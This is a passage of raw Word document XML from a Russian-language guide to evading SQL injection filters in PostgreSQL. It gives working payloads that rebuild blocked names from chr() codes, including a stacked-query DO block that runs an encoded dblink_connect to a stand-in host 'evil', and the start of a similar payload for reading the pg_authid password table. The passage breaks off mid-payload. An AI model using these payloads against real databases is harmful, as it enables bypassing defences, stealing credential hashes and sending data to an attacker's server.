        <w:t>•   Аналогичные blacklist-правила в самописных sanitizer-ах (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>if "pg_authid" in q: reject</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27120C80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Идея: имя опасной функции/таблицы/значения литерала строится во время выполнения из ASCII-кодов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(N)||chr(N)||...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. В тексте payload-а подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет — только числа. PG в рантайме конкатенирует и получает нужную строку.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A764AEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Принципиальное ограничение: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chr-конкатенация даёт строковое значение, не SQL-токен</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Имена функций и таблиц парсер PG резолвит на этапе AST-build (до выполнения), поэтому </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT (chr(100)||chr(98)||...)('host=evil')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — не работает: парсер ждёт идентификатор, а не выражение. Чтобы использовать chr-результат как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>имя функции/таблицы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, его надо подать в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (только в plpgsql-контексте, см. Payload B) или в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>format(..., ...)::regprocedure/::regclass</w:t>
      </w:r>
      <w:r>
        <w:t>-каст.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725BB1F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — chr-литерал для значения (без DO-блока)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D885752" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Применимо, когда фильтр блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>содержимое</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> строкового литерала. Например, sanitizer запрещает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'pg_authid'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как substring в любом параметре.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228AD46F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст — поиск </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = '{q}'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, фильтр блокирует литерал </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@'</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="430472AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Payload (в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>q</w:t>
      </w:r>
      <w:r>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB03436"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chr(97)||chr(100)||chr(109)||chr(105)||chr(110)||chr(64)||chr(99)||chr(111)||chr(46)||chr(99)||chr(111)||chr(109) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECFBB88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725A27EB"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07BA6892"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154A68CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A3706A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE email = chr(97)||chr(100)||chr(109)||chr(105)||chr(110)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331C7A96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">           ||chr(64)||chr(99)||chr(111)||chr(46)||chr(99)||chr(111)||chr(109) --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66978B6E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG считает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr(97)||chr(100)||...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'admin@co.com'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на этапе исполнения и подставляет в WHERE. WAF/sanitizer на стороне приложения не увидел этой строки — только числа 97, 100, 109 и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECCEAFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Альтернативные компактные формы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765F67DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Через `string_agg`:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45206A78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  (SELECT string_agg(chr(c)::text, '') FROM unnest(ARRAY[97,100,109,105,110,64,99,111,46,99,111,109]) AS c)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A147B4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Через `convert_from + decode`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — рассматривается отдельно в 3.9.5 как самостоятельный приём (компактнее </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>chr</w:t>
      </w:r>
      <w:r>
        <w:t>-цепочки для длинных строк).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51486A27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — chr для имени функции/таблицы (требует EXECUTE в DO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="621D48FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Применимо, когда фильтр блокирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>имя функции/таблицы</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. WAF из 3.9.0 блокирует подстроку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_read</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Payload A здесь не поможет, потому что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT chr(100)||chr(98)||...||'(...)'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> это не вызов функции, это строка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1885DE31" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Решение: построить целую SQL-команду как chr-конкатенацию и подать в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри plpgsql DO-блока.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A9ADD4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Контекст — точка инъекции, допускающая stacked queries (например, через 3.5 в simple-protocol драйвере, или через payload в идентификаторе ORDER BY где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пропускается):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227E886A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4421A6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1; DO $do$ BEGIN PERFORM dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(101)||chr(118)||chr(105)||chr(108)||chr(46)||chr(116)||chr(108)||chr(100)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||current_user||chr(32)||chr(100)||chr(98)||chr(110)||chr(97)||chr(109)||chr(101)||chr(61)||chr(120)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(120)); END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCBC0A9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Здесь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink_connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — единственное имя функции, которое всё-таки в тексте есть. Если WAF блокирует именно эту подстроку, нужно идти глубже — построить и сам вызов через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AAE7D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1; DO $do$ DECLARE conn text; BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558CF1C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE chr(83)||chr(69)||chr(76)||chr(69)||chr(67)||chr(84)||chr(32)||chr(100)||chr(98)||chr(108)||chr(105)||chr(110)||chr(107)||chr(95)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(40)||chr(39)||chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(101)||chr(118)||chr(105)||chr(108)||chr(39)||chr(41);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2454DC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD82F2C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Где chr-цепочка после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> собирается в строку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT dblink_connect('host=evil')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Парсер PG никогда не видит подстроки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dblink</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — только числовые литералы и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (которое в большинстве WAF-rule-set не блочится, потому что слишком много false positives).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F968E1E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в результате доходит до сервера:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD6D44A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title FROM articles ORDER BY ... LIMIT 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559AE7FC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DO $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C284DE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE conn text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6FF5B6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413248BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE chr(83)||chr(69)||...||chr(41);  -- == 'SELECT dblink_connect(''host=evil'')'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411D8427" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END $do$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2463B1EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PG парсит DO-блок, plpgsql-исполнитель в рантайме конкатенирует chr-ы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT dblink_connect('host=evil')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и динамически исполняет — обычный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plpgsql, для парсера PG в момент чтения payload-а никаких опасных подстрок нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAD77D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Тот же приём работает для извлечения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_authid</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDB230F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>1; DO $do$ DECLARE r record; BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDCD9E1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
